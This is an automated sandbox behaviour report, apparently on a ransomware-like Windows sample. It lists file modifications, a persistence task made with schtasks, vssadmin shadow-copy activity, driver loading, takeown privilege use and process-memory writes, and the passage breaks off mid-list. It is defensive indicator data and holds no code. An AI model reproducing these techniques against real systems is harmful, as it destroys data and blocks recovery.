c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\LockSearch.ADT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1188 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1440 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1732 WSBgHpvp64.exe 1732 WSBgHpvp64.exe 1732 WSBgHpvp64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1732 WSBgHpvp64.exe -
Suspicious use of AdjustPrivilegeToken 96 IoCs
description pid Process Token: SeDebugPrivilege 1732 WSBgHpvp64.exe Token: SeLoadDriverPrivilege 1732 WSBgHpvp64.exe Token: SeTakeOwnershipPrivilege 1120 takeown.exe Token: SeTakeOwnershipPrivilege 1608 takeown.exe Token: SeTakeOwnershipPrivilege 1040 takeown.exe Token: SeTakeOwnershipPrivilege 1992 takeown.exe Token: SeTakeOwnershipPrivilege 792 takeown.exe Token: SeTakeOwnershipPrivilege 1576 takeown.exe Token: SeTakeOwnershipPrivilege 652 takeown.exe Token: SeTakeOwnershipPrivilege 1864 takeown.exe Token: SeTakeOwnershipPrivilege 268 takeown.exe Token: SeTakeOwnershipPrivilege 1268 takeown.exe Token: SeTakeOwnershipPrivilege 1312 takeown.exe Token: SeTakeOwnershipPrivilege 788 takeown.exe Token: SeTakeOwnershipPrivilege 1720 takeown.exe Token: SeTakeOwnershipPrivilege 1992 takeown.exe Token: SeTakeOwnershipPrivilege 1196 takeown.exe Token: SeTakeOwnershipPrivilege 1992 takeown.exe Token: SeTakeOwnershipPrivilege 1864 takeown.exe Token: SeTakeOwnershipPrivilege 1064 takeown.exe Token: SeTakeOwnershipPrivilege 1268 takeown.exe Token: SeTakeOwnershipPrivilege 520 takeown.exe Token: SeTakeOwnershipPrivilege 1196 takeown.exe Token: SeTakeOwnershipPrivilege 1220 takeown.exe Token: SeTakeOwnershipPrivilege 1460 takeown.exe Token: SeTakeOwnershipPrivilege 432 takeown.exe Token: SeTakeOwnershipPrivilege 1464 takeown.exe Token: SeTakeOwnershipPrivilege 1992 takeown.exe Token: SeTakeOwnershipPrivilege 1040 takeown.exe Token: SeTakeOwnershipPrivilege 940 takeown.exe Token: SeTakeOwnershipPrivilege 324 takeown.exe Token: SeTakeOwnershipPrivilege 1368 takeown.exe Token: SeTakeOwnershipPrivilege 1120 takeown.exe Token: SeBackupPrivilege 1724 vssvc.exe Token: SeRestorePrivilege 1724 vssvc.exe Token: SeAuditPrivilege 1724 vssvc.exe Token: SeTakeOwnershipPrivilege 1640 takeown.exe Token: SeTakeOwnershipPrivilege 1640 takeown.exe Token: SeIncreaseQuotaPrivilege 212 WMIC.exe Token: SeSecurityPrivilege 212 WMIC.exe Token: SeTakeOwnershipPrivilege 212 WMIC.exe Token: SeLoadDriverPrivilege 212 WMIC.exe Token: SeSystemProfilePrivilege 212 WMIC.exe Token: SeSystemtimePrivilege 212 WMIC.exe Token: SeProfSingleProcessPrivilege 212 WMIC.exe Token: SeIncBasePriorityPrivilege 212 WMIC.exe Token: SeCreatePagefilePrivilege 212 WMIC.exe Token: SeBackupPrivilege 212 WMIC.exe Token: SeRestorePrivilege 212 WMIC.exe Token: SeShutdownPrivilege 212 WMIC.exe Token: SeDebugPrivilege 212 WMIC.exe Token: SeSystemEnvironmentPrivilege 212 WMIC.exe Token: SeRemoteShutdownPrivilege 212 WMIC.exe Token: SeUndockPrivilege 212 WMIC.exe Token: SeManageVolumePrivilege 212 WMIC.exe Token: 33 212 WMIC.exe Token: 34 212 WMIC.exe Token: 35 212 WMIC.exe Token: SeIncreaseQuotaPrivilege 212 WMIC.exe Token: SeSecurityPrivilege 212 WMIC.exe Token: SeTakeOwnershipPrivilege 212 WMIC.exe Token: SeLoadDriverPrivilege 212 WMIC.exe Token: SeSystemProfilePrivilege 212 WMIC.exe Token: SeSystemtimePrivilege 212 WMIC.exe Token: SeProfSingleProcessPrivilege 212 WMIC.exe Token: SeIncBasePriorityPrivilege 212 WMIC.exe Token: SeCreatePagefilePrivilege 212 WMIC.exe Token: SeBackupPrivilege 212 WMIC.exe Token: SeRestorePrivilege 212 WMIC.exe Token: SeShutdownPrivilege 212 WMIC.exe Token: SeDebugPrivilege 212 WMIC.exe Token: SeSystemEnvironmentPrivilege 212 WMIC.exe Token: SeRemoteShutdownPrivilege 212 WMIC.exe Token: SeUndockPrivilege 212 WMIC.exe Token: SeManageVolumePrivilege 212 WMIC.exe Token: 33 212 WMIC.exe Token: 34 212 WMIC.exe Token: 35 212 WMIC.exe Token: SeTakeOwnershipPrivilege 1960 takeown.exe Token: SeTakeOwnershipPrivilege 1064 takeown.exe Token: SeTakeOwnershipPrivilege 1132 takeown.exe Token: SeTakeOwnershipPrivilege 1548 takeown.exe Token: SeTakeOwnershipPrivilege 1916 takeown.exe Token: SeTakeOwnershipPrivilege 520 takeown.exe Token: SeTakeOwnershipPrivilege 324 takeown.exe Token: SeTakeOwnershipPrivilege 1040 takeown.exe Token: SeTakeOwnershipPrivilege 516 takeown.exe Token: SeTakeOwnershipPrivilege 520 takeown.exe Token: SeTakeOwnershipPrivilege 1548 takeown.exe Token: SeTakeOwnershipPrivilege 1480 takeown.exe Token: SeTakeOwnershipPrivilege 1164 takeown.exe Token: SeTakeOwnershipPrivilege 1040 takeown.exe Token: SeTakeOwnershipPrivilege 1916 takeown.exe Token: SeTakeOwnershipPrivilege 1600 takeown.exe Token: SeTakeOwnershipPrivilege 1196 takeown.exe Token: SeTakeOwnershipPrivilege 1440 takeown.exe -
Suspicious use of WriteProcessMemory 4362 IoCs
description pid Process procid_target PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 26 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 26 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 26 PID 1436 wrote to memory of 1728 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 26 PID 1436 wrote to memory of 1744 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 28 PID 1436 wrote to memory of 1744 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 28 PID 1436 wrote to memory of 1744 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 28 PID 1436 wrote to memory of 1744 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 28 PID 1436 wrote to memory of 840 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 33 PID 1436 wrote to memory of 840 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 33 PID 1436 wrote to memory of 840 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 33 PID 1436 wrote to memory of 840 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 33 PID 1436 wrote to memory of 1056 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 34 PID 1436 wrote to memory of 1056 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 34 PID 1436 wrote to memory of 1056 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 34 PID 1436 wrote to memory of 1056 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 34 PID 840 wrote to memory of 1288 840 cmd.exe 37 PID 840 wrote to memory of 1288 840 cmd.exe 37 PID 840 wrote to memory of 1288 840 cmd.exe 37 PID 840 wrote to memory of 1288 840 cmd.exe 37 PID 1056 wrote to memory of 1760 1056 cmd.exe 38 PID 1056 wrote to memory of 1760 1056 cmd.exe 38 PID 1056 wrote to memory of 1760 1056 cmd.exe 38 PID 1056 wrote to memory of 1760 1056 cmd.exe 38 PID 840 wrote to memory of 892 840 cmd.exe 39 PID 840 wrote to memory of 892 840 cmd.exe 39 PID 840 wrote to memory of 892 840 cmd.exe 39 PID 840 wrote to memory of 892 840 cmd.exe 39 PID 840 wrote to memory of 1220 840 cmd.exe 40 PID 840 wrote to memory of 1220 840 cmd.exe 40 PID 840 wrote to memory of 1220 840 cmd.exe 40 PID 840 wrote to memory of 1220 840 cmd.exe 40 PID 1436 wrote to memory of 2008 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 42 PID 1436 wrote to memory of 2008 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 42 PID 1436 wrote to memory of 2008 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 42 PID 1436 wrote to memory of 2008 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 42 PID 2008 wrote to memory of 604 2008 cmd.exe 44 PID 2008 wrote to memory of 604 2008 cmd.exe 44 PID 2008 wrote to memory of 604 2008 cmd.exe 44 PID 2008 wrote to memory of 604 2008 cmd.exe 44 PID 2008 wrote to memory of 1488 2008 cmd.exe 45 PID 2008 wrote to memory of 1488 2008 cmd.exe 45 PID 2008 wrote to memory of 1488 2008 cmd.exe 45 PID 2008 wrote to memory of 1488 2008 cmd.exe 45 PID 2008 wrote to memory of 2016 2008 cmd.exe 46 PID 2008 wrote to memory of 2016 2008 cmd.exe 46 PID 2008 wrote to memory of 2016 2008 cmd.exe 46 PID 2008 wrote to memory of 2016 2008 cmd.exe 46 PID 2016 wrote to memory of 856 2016 cmd.exe 47 PID 2016 wrote to memory of 856 2016 cmd.exe 47 PID 2016 wrote to memory of 856 2016 cmd.exe 47 PID 2016 wrote to memory of 856 2016 cmd.exe 47 PID 1436 wrote to memory of 336 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 48 PID 1436 wrote to memory of 336 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 48 PID 1436 wrote to memory of 336 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 48 PID 1436 wrote to memory of 336 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 48 PID 336 wrote to memory of 1132 336 cmd.exe 50 PID 336 wrote to memory of 1132 336 cmd.exe 50 PID 336 wrote to memory of 1132 336 cmd.exe 50 PID 336 wrote to memory of 1132 336 cmd.exe 50 PID 336 wrote to memory of 2020 336 cmd.exe 51 PID 336 wrote to memory of 2020 336 cmd.exe 51 PID 336 wrote to memory of 2020 336 cmd.exe 51 PID 336 wrote to memory of 2020 336 cmd.exe 51 PID 336 wrote to memory of 1536 336 cmd.exe 52 PID 336 wrote to memory of 1536 336 cmd.exe 52 PID 336 wrote to memory of 1536 336 cmd.exe 52 PID 336 wrote to memory of 1536 336 cmd.exe 52 PID 1536 wrote to memory of 1768 1536 cmd.exe 53 PID 1536 wrote to memory of 1768 1536 cmd.exe 53 PID 1536 wrote to memory of 1768 1536 cmd.exe 53 PID 1536 wrote to memory of 1768 1536 cmd.exe 53 PID 856 wrote to memory of 1732 856 WSBgHpvp.exe 54 PID 856 wrote to memory of 1732 856 WSBgHpvp.exe 54 PID 856 wrote to memory of 1732 856 WSBgHpvp.exe 54 PID 856 wrote to memory of 1732 856 WSBgHpvp.exe 54 PID 336 wrote to memory of 1036 336 cmd.exe 55 PID 336 wrote to memory of 1036 336 cmd.exe 55 PID 336 wrote to memory of 1036 336 cmd.exe 55 PID 336 wrote to memory of 1036 336 cmd.exe 55 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 56 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 56 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 56 PID 1436 wrote to memory of 1040 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 56 PID 1040 wrote to memory of 1672 1040 cmd.exe 58 PID 1040 wrote to memory of 1672 1040 cmd.exe 58 PID 1040 wrote to memory of 1672 1040 cmd.exe 58 PID 1040 wrote to memory of 1672 1040 cmd.exe 58 PID 1040 wrote to memory of 924 1040 cmd.exe 59 PID 1040 wrote to memory of 924 1040 cmd.exe 59 PID 1040 wrote to memory of 924 1040 cmd.exe 59 PID 1040 wrote to memory of 924 1040 cmd.exe 59 PID 1040 wrote to memory of 1748 1040 cmd.exe 60 PID 1040 wrote to memory of 1748 1040 cmd.exe 60 PID 1040 wrote to memory of 1748 1040 cmd.exe 60 PID 1040 wrote to memory of 1748 1040 cmd.exe 60 PID 1748 wrote to memory of 1800 1748 cmd.exe 61 PID 1748 wrote to memory of 1800 1748 cmd.exe 61 PID 1748 wrote to memory of 1800 1748 cmd.exe 61 PID 1748 wrote to memory of 1800 1748 cmd.exe 61 PID 1040 wrote to memory of 1216 1040 cmd.exe 62 PID 1040 wrote to memory of 1216 1040 cmd.exe 62 PID 1040 wrote to memory of 1216 1040 cmd.exe 62 PID 1040 wrote to memory of 1216 1040 cmd.exe 62 PID 1436 wrote to memory of 1944 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 63 PID 1436 wrote to memory of 1944 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 63 PID 1436 wrote to memory of 1944 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 63 PID 1436 wrote to memory of 1944 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 63 PID 1944 wrote to memory of 604 1944 cmd.exe 65 PID 1944 wrote to memory of 604 1944 cmd.exe 65 PID 1944 wrote to memory of 604 1944 cmd.exe 65 PID 1944 wrote to memory of 604 1944 cmd.exe 65 PID 1944 wrote to memory of 1488 1944 cmd.exe 66 PID 1944 wrote to memory of 1488 1944 cmd.exe 66 PID 1944 wrote to memory of 1488 1944 cmd.exe 66 PID 1944 wrote to memory of 1488 1944 cmd.exe 66 PID 1944 wrote to memory of 1120 1944 cmd.exe 67 PID 1944 wrote to memory of 1120 1944 cmd.exe 67 PID 1944 wrote to memory of 1120 1944 cmd.exe 67 PID 1944 wrote to memory of 1120 1944 cmd.exe 67 PID 1120 wrote to memory of 912 1120 cmd.exe 68 PID 1120 wrote to memory of 912 1120 cmd.exe 68 PID 1120 wrote to memory of 912 1120 cmd.exe 68 PID 1120 wrote to memory of 912 1120 cmd.exe 68 PID 1944 wrote to memory of 1132 1944 cmd.exe 69 PID 1944 wrote to memory of 1132 1944 cmd.exe 69 PID 1944 wrote to memory of 1132 1944 cmd.exe 69 PID 1944 wrote to memory of 1132 1944 cmd.exe 69 PID 1436 wrote to memory of 1268 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 70 PID 1436 wrote to memory of 1268 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 70 PID 1436 wrote to memory of 1268 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 70 PID 1436 wrote to memory of 1268 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 70 PID 1268 wrote to memory of 652 1268 cmd.exe 72 PID 1268 wrote to memory of 652 1268 cmd.exe 72 PID 1268 wrote to memory of 652 1268 cmd.exe 72 PID 1268 wrote to memory of 652 1268 cmd.exe 72 PID 1268 wrote to memory of 336 1268 cmd.exe 73 PID 1268 wrote to memory of 336 1268 cmd.exe 73 PID 1268 wrote to memory of 336 1268 cmd.exe 73 PID 1268 wrote to memory of 336 1268 cmd.exe 73 PID 1268 wrote to memory of 1036 1268 cmd.exe 74 PID 1268 wrote to memory of 1036 1268 cmd.exe 74 PID 1268 wrote to memory of 1036 1268 cmd.exe 74 PID 1268 wrote to memory of 1036 1268 cmd.exe 74 PID 1036 wrote to memory of 268 1036 cmd.exe 75 PID 1036 wrote to memory of 268 1036 cmd.exe 75 PID 1036 wrote to memory of 268 1036 cmd.exe 75 PID 1036 wrote to memory of 268 1036 cmd.exe 75 PID 1268 wrote to memory of 1616 1268 cmd.exe 76 PID 1268 wrote to memory of 1616 1268 cmd.exe 76 PID 1268 wrote to memory of 1616 1268 cmd.exe 76 PID 1268 wrote to memory of 1616 1268 cmd.exe 76 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 77 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 77 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 77 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 77 PID 612 wrote to memory of 1752 612 cmd.exe 79 PID 612 wrote to memory of 1752 612 cmd.exe 79 PID 612 wrote to memory of 1752 612 cmd.exe 79 PID 612 wrote to memory of 1752 612 cmd.exe 79 PID 612 wrote to memory of 1796 612 cmd.exe 80 PID 612 wrote to memory of 1796 612 cmd.exe 80 PID 612 wrote to memory of 1796 612 cmd.exe 80 PID 612 wrote to memory of 1796 612 cmd.exe 80 PID 612 wrote to memory of 1288 612 cmd.exe 81 PID 612 wrote to memory of 1288 612 cmd.exe 81 PID 612 wrote to memory of 1288 612 cmd.exe 81 PID 612 wrote to memory of 1288 612 cmd.exe 81 PID 1288 wrote to memory of 840 1288 cmd.exe 82 PID 1288 wrote to memory of 840 1288 cmd.exe 82 PID 1288 wrote to memory of 840 1288 cmd.exe 82 PID 1288 wrote to memory of 840 1288 cmd.exe 82 PID 612 wrote to memory of 1188 612 cmd.exe 83 PID 612 wrote to memory of 1188 612 cmd.exe 83 PID 612 wrote to memory of 1188 612 cmd.exe 83 PID 612 wrote to memory of 1188 612 cmd.exe 83 PID 1436 wrote to memory of 1368 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 84 PID 1436 wrote to memory of 1368 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 84 PID 1436 wrote to memory of 1368 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 84 PID 1436 wrote to memory of 1368 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 84 PID 1368 wrote to memory of 1500 1368 cmd.exe 86 PID 1368 wrote to memory of 1500 1368 cmd.exe 86 PID 1368 wrote to memory of 1500 1368 cmd.exe 86 PID 1368 wrote to memory of 1500 1368 cmd.exe 86 PID 1368 wrote to memory of 872 1368 cmd.exe 87 PID 1368 wrote to memory of 872 1368 cmd.exe 87 PID 1368 wrote to memory of 872 1368 cmd.exe 87 PID 1368 wrote to memory of 872 1368 cmd.exe 87 PID 1368 wrote to memory of 912 1368 cmd.exe 88 PID 1368 wrote to memory of 912 1368 cmd.exe 88 PID 1368 wrote to memory of 912 1368 cmd.exe 88 PID 1368 wrote to memory of 912 1368 cmd.exe 88 PID 912 wrote to memory of 2020 912 cmd.exe 89 PID 912 wrote to memory of 2020 912 cmd.exe 89 PID 912 wrote to memory of 2020 912 cmd.exe 89 PID 912 wrote to memory of 2020 912 cmd.exe 89 PID 1368 wrote to memory of 1416 1368 cmd.exe 90 PID 1368 wrote to memory of 1416 1368 cmd.exe 90 PID 1368 wrote to memory of 1416 1368 cmd.exe 90 PID 1368 wrote to memory of 1416 1368 cmd.exe 90 PID 1436 wrote to memory of 1768 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 91 PID 1436 wrote to memory of 1768 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 91 PID 1436 wrote to memory of 1768 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 91 PID 1436 wrote to memory of 1768 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 91 PID 1768 wrote to memory of 820 1768 cmd.exe 93 PID 1768 wrote to memory of 820 1768 cmd.exe 93 PID 1768 wrote to memory of 820 1768 cmd.exe 93 PID 1768 wrote to memory of 820 1768 cmd.exe 93 PID 1768 wrote to memory of 1312 1768 cmd.exe 94 PID 1768 wrote to memory of 1312 1768 cmd.exe 94 PID 1768 wrote to memory of 1312 1768 cmd.exe 94 PID 1768 wrote to memory of 1312 1768 cmd.exe 94 PID 1768 wrote to memory of 936 1768 cmd.exe 95 PID 1768 wrote to memory of 936 1768 cmd.exe 95 PID 1768 wrote to memory of 936 1768 cmd.exe 95 PID 1768 wrote to memory of 936 1768 cmd.exe 95 PID 936 wrote to memory of 1036 936 cmd.exe 96 PID 936 wrote to memory of 1036 936 cmd.exe 96 PID 936 wrote to memory of 1036 936 cmd.exe 96 PID 936 wrote to memory of 1036 936 cmd.exe 96 PID 1768 wrote to memory of 1616 1768 cmd.exe 97 PID 1768 wrote to memory of 1616 1768 cmd.exe 97 PID 1768 wrote to memory of 1616 1768 cmd.exe 97 PID 1768 wrote to memory of 1616 1768 cmd.exe 97 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 98 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 98 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 98 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 98 PID 1428 wrote to memory of 1800 1428 cmd.exe 100 PID 1428 wrote to memory of 1800 1428 cmd.exe 100 PID 1428 wrote to memory of 1800 